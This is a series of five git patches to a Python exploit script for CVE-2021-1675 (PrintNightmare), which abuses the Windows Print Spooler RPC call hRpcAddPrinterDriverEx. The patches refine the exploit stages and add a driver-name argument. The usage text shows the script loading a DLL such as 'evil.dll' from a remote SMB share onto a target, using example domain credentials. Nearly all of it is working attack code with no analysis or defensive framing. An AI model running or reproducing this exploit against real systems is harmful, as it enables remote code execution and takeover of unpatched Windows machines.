From d6ecf9976e78fc9c37caa9ad1c3360447c785a96 Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 09:53:08 +0200 Subject: [PATCH 1/5] Remove brute force backup files --- CVE-2021-1675.py | 20 ++++++++------------ 1 file changed, 8 insertions(+), 12 deletions(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 611606b..1525298 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -84,18 +84,14 @@ def main(dce, pDriverPath, share, handle=NULL): resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) print("[*] Stage0: {0}".format(resp['ErrorCode'])) - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\kernelbase.dll\x00" - for i in range(1, 30): - try: - container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\{0}\\{1}\x00".format(i, filename) - resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) - print("[*] Stage{0}: {1}".format(i, resp['ErrorCode'])) - if (resp['ErrorCode'] == 0): - print("[+] Exploit Completed") - sys.exit() - except Exception as e: - #print(e) - pass + # Just ask for a new driver with already installed files + container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) + flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 + resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) + + print("[*] Stage1: {0}".format(resp['ErrorCode'])) + if (resp['ErrorCode'] == 0): + print("[+] Exploit Completed") if __name__ == '__main__': From 74030a63c1b2dbed1868b362ae6d43f2060487cc Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 09:59:13 +0200 Subject: [PATCH 2/5] Remove tries --- CVE-2021-1675.py | 7 ------- 1 file changed, 7 deletions(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 1525298..e850c6d 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -166,11 +166,4 @@ Example; print("[+] pDriverPath Found {0}".format(pDriverPath)) print("[*] Executing {0}".format(options.share)) - - #re-run if stage0/stageX fails - print("[*] Try 1...") main(dce, pDriverPath, options.share) - print("[*] Try 2...") - main(dce, pDriverPath,options.share) - print("[*] Try 3...") - main(dce, pDriverPath,options.share) From b33e65a34ef08f02394952d85924d5793bb8a7bd Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 10:02:43 +0200 Subject: [PATCH 3/5] Add name --- CVE-2021-1675.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index e850c6d..78824da 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -72,7 +72,7 @@ def main(dce, pDriverPath, share, handle=NULL): container_info['Level'] = 2 container_info['DriverInfo']['tag'] = 2 container_info['DriverInfo']['Level2']['cVersion'] = 3 - container_info['DriverInfo']['Level2']['pName'] = "1234\x00" + container_info['DriverInfo']['Level2']['pName'] = "Stage0\x00" container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) @@ -85,6 +85,7 @@ def main(dce, pDriverPath, share, handle=NULL): print("[*] Stage0: {0}".format(resp['ErrorCode'])) # Just ask for a new driver with already installed files + container_info['DriverInfo']['Level2']['pName'] = "Stage1\x00" container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) From d1b9fdd7235f4c0a6950b6707088ca4280e0330a Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 10:12:51 +0200 Subject: [PATCH 4/5] Add parameter for driver name --- CVE-2021-1675.py | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index 78824da..edfbda1 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL): return blob -def main(dce, pDriverPath, share, handle=NULL): +def main(dce, pDriverPath, name, share, handle=NULL): #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 container_info['DriverInfo']['tag'] = 2 container_info['DriverInfo']['Level2']['cVersion'] = 3 - container_info['DriverInfo']['Level2']['pName'] = "Stage0\x00" + container_info['DriverInfo']['Level2']['pName'] = "{0}0\x00".format(name) container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) @@ -85,7 +85,7 @@ def main(dce, pDriverPath, share, handle=NULL): print("[*] Stage0: {0}".format(resp['ErrorCode'])) # Just ask for a new driver with already installed files - container_info['DriverInfo']['Level2']['pName'] = "Stage1\x00" + container_info['DriverInfo']['Level2']['pName'] = "{0}1\x00".format(name) container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) @@ -102,6 +102,7 @@ Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') + parser.add_argument('name', action='store', help='name of driver [need to be unique on target]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") group = parser.add_argument_group('authentication') @@ -167,4 +168,4 @@ Example; print("[+] pDriverPath Found {0}".format(pDriverPath)) print("[*] Executing {0}".format(options.share)) - main(dce, pDriverPath, options.share) + main(dce, pDriverPath, options.name, options.share) From ee5512a692824b3eb9264ee3600db5721c491509 Mon Sep 17 00:00:00 2001 From: citronneur Date: Sun, 4 Jul 2021 10:19:51 +0200 Subject: [PATCH 5/5] More explicit parameter name --- CVE-2021-1675.py | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/CVE-2021-1675.py b/CVE-2021-1675.py index edfbda1..0a9ae37 100644 --- a/CVE-2021-1675.py +++ b/CVE-2021-1675.py @@ -66,13 +66,13 @@ def getDrivers(dce, handle=NULL): return blob -def main(dce, pDriverPath, name, share, handle=NULL): +def main(dce, pDriverPath, driverName, share, handle=NULL): #build DRIVER_CONTAINER package container_info = rprn.DRIVER_CONTAINER() container_info['Level'] = 2 container_info['DriverInfo']['tag'] = 2 container_info['DriverInfo']['Level2']['cVersion'] = 3 - container_info['DriverInfo']['Level2']['pName'] = "{0}0\x00".format(name) + container_info['DriverInfo']['Level2']['pName'] = "{0}0\x00".format(driverName) container_info['DriverInfo']['Level2']['pEnvironment'] = "Windows x64\x00" container_info['DriverInfo']['Level2']['pDriverPath'] = pDriverPath + '\x00' container_info['DriverInfo']['Level2']['pDataFile'] = "{0}\x00".format(share) @@ -85,7 +85,7 @@ def main(dce, pDriverPath, name, share, handle=NULL): print("[*] Stage0: {0}".format(resp['ErrorCode'])) # Just ask for a new driver with already installed files - container_info['DriverInfo']['Level2']['pName'] = "{0}1\x00".format(name) + container_info['DriverInfo']['Level2']['pName'] = "{0}1\x00".format(driverName) container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename) flags = rprn.APD_COPY_NEW_FILES | 0x10 | 0x8000 resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) @@ -102,7 +102,7 @@ Example; ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' """) parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') - parser.add_argument('name', action='store', help='name of driver [need to be unique on target]') + parser.add_argument('driverName', action='store', help='name of driver [need to be unique on target]') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') parser.add_argument('pDriverPath', action='store', help='Driver path. Example \'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\'', nargs="?") group = parser.add_argument_group('authentication') @@ -168,4 +168,4 @@ Example; print("[+] pDriverPath Found {0}".format(pDriverPath)) print("[*] Executing {0}".format(options.share)) - main(dce, pDriverPath, options.name, options.share) + main(dce, pDriverPath, options.driverName, options.share)